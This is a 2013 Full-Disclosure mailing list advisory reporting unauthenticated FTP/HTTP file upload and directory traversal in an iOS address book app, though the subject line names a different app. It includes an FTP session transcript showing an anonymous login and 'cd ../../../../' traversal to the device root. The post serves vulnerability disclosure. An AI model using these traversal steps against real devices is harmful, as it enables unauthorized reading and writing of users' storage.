[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Unauthenticated Remote File Upload via HTTP for lua-Programming language 2.0 on iOS

To: full <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Unauthenticated Remote File Upload via HTTP for lua-Programming language 2.0 on iOS
From: "Larry W. Cashdollar" <larry0@xxxxxx>
Date: Thu, 12 Sep 2013 19:16:18 +0000 (GMT)

<html><body><div><b style="font-family: Times; font-size: medium; ">TITLE: 
Unauthenticated Remote File Upload via HTTP for lua-Programming language 2.0 on 
iOS</b></div><div><font face="Times" size="3"><b><br></b></font><span 
style="font-family: Times; font-size: medium; "></span><p style="font-family: 
Times; font-size: medium; ">Date: 8/1/2013</p><p style="font-family: Times; 
font-size: medium; ">Author: Larry W. Cashdollar, @_larry0</p><p 
style="font-family: Times; font-size: medium; "><br></p><p style="font-family: 
Times; font-size: medium; ">Download:</p><ol style="font-family: Times; 
font-size: medium; 
"><li>https://itunes.apple.com/us/app/personal-address-book-helpful/id490328390?mt=8</li><li>http://www.tayutec.com/indexen.html</li></ol><p
 style="font-family: Times; font-size: medium; ">Description: "Features:</p><ol 
style="font-family: Times; font-size: medium; "><li>To create colorful dial 
keyboard- each dial button to display different colors !</li><li>You can rotate 
or scale or move picture when you edit background image , you can set the 
picture fuzzy, long press(2 seconds) to change back image to the window size , 
try quickly!</li><li>You can set different colors for different 
groups!</li><li>You can set friend's head image by click the friend head in the 
friend table!</li><li>You can organise your contacts , support the same name 
,no name , no number , no e-mail.</li></ol><span style="font-family: Times; 
font-size: medium; ">------------- Functions:</span><li style="font-family: 
Times; font-size: medium; ">You can control the background image and color, and 
dial-up voice, text color and shadow, background animation, switch interface 
animation, the number and the order of the main interface of the tab bar to 
create your personalized address book.</li><li style="font-family: Times; 
font-size: medium; ">Send single , group, any more person's message , to 
increase the content of the messages backup system , you can choose the content 
of the message from the backup system , so let the cumbersome process of 
content of the message input to become history.</li><li style="font-family: 
Times; font-size: medium; ">Sliding around to switch tabs or off the interface 
, giving you a more intimate operating experience.</li><li style="font-family: 
Times; font-size: medium; ">Using SMS , Bluetooth, two-dimensional code to 
share contact of individuals ã€groupsã€ any more than ,I believe you will 
love to share contacts.</li><li style="font-family: Times; font-size: medium; 
">Organize contacts and group , you can once to increase or delete multiple 
contacts and group, increased sorting and statistical unstructured contacts , 
easy management of contacts.</li><li style="font-family: Times; font-size: 
medium; ">Using numbers ã€name to search , in dial-up interface ,you can click 
to dial and long press to send message from the search results. it's quickly 
and easily.</li><li style="font-family: Times; font-size: medium; ">You can 
upload learning materials to the local on the computer via wifi, support http 
and ftp two upload ways. The file system supports txt, pdf, chm, mp3,zip, gif, 
png, html ..."</li><span style="font-family: Times; font-size: medium; 
"><div><span style="font-family: Times; font-size: medium; 
"><br></span></div><strong>Vulnerabilities</strong>: 'iOSftp' &amp; http 
unauthenticated file uplolads. The application is sandboxed, but any remote 
user can read/write to the devices storage.&nbsp;</span><br style="font-family: 
Times; font-size: medium; "><span style="font-family: Times; font-size: medium; 
">The uploaded content is served out of the http servers directory. While the 
http server doesn't process server side scripts it is possible to upload and 
serve malicious / illegal content. I would think it's also possible to fill up 
the devices storage as well but did not test it.&nbsp;</span><br 
style="font-family: Times; font-size: medium; "><pre>larry$ ftp 192.168.0.31  
10000
Connected to 192.168.0.31.
220 iosFtp server ready.
Name (192.168.0.31:larry): anyone
331 Password required for anyone
Password: 
230 User anyone logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; pwd
Remote directory: 
/private/var/mobile/Applications/C6EA44B6-1285-4C94-B0E0-348309B7322B/Documents/ftp
 *
ftp&gt; cd ../../../../
250 CWD command successful.
ftp&gt; pwd
Remote directory: /private/var/mobile
ftp&gt; cd /
250 CWD command successful.
ftp&gt; pwd
Remote directory: /
ftp&gt; </pre><span style="font-family: Times; font-size: medium; ">* You also 
get path disclosure.&nbsp;</span><br style="font-family: Times; font-size: 
medium; "><span style="font-family: Times; font-size: medium; ">http server 
listening on port 8080 allows arbitrary file writes to 
storage.</span></div><div><br style="font-family: Times; font-size: medium; 
"><span style="font-family: Times; font-size: medium; ">You can create 
directories out side the upload path through the file upload web interface and 
the .. bug. Because the application is sandbox I was unable to overwtite 
application executables and components so impact is limited. As stated above 
you can serve malicious content (javascript/html) via 
http.&nbsp;</span></div><div><br style="font-family: Times; font-size: medium; 
"><img src="http://vapid.dhs.org/advisories/webint.gif"; style="font-family: 
Times; font-size: medium; "><span style="font-family: Times; font-size: medium; 
"></span><p style="font-family: Times; font-size: medium; ">Vendor: Notified 
8/1/2013, https://twitter.com/tayutec</p><p style="font-family: Times; 
font-size: medium; "><br></p><span style="font-family: Times; font-size: 
medium; ">Advisory: http://vapid.dhs.org/advisories/</span><font face="Times" 
size="3">personal-address-book-XiaoWen.html</font></div></body></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Unauthenticated Remote File Upload via HTTP for lua-Programming language 2.0 on iOS
  - From: Larry W. Cashdollar

Prev by Date: Re: [Full-disclosure] Internet has vuln.
Next by Date: Re: [Full-disclosure] Internet has vuln.
Previous by thread: [Full-disclosure] [ MDVSA-2013:231 ] openswan
Next by thread: Re: [Full-disclosure] Unauthenticated Remote File Upload via HTTP for lua-Programming language 2.0 on iOS
Index(es):
- Date
- Thread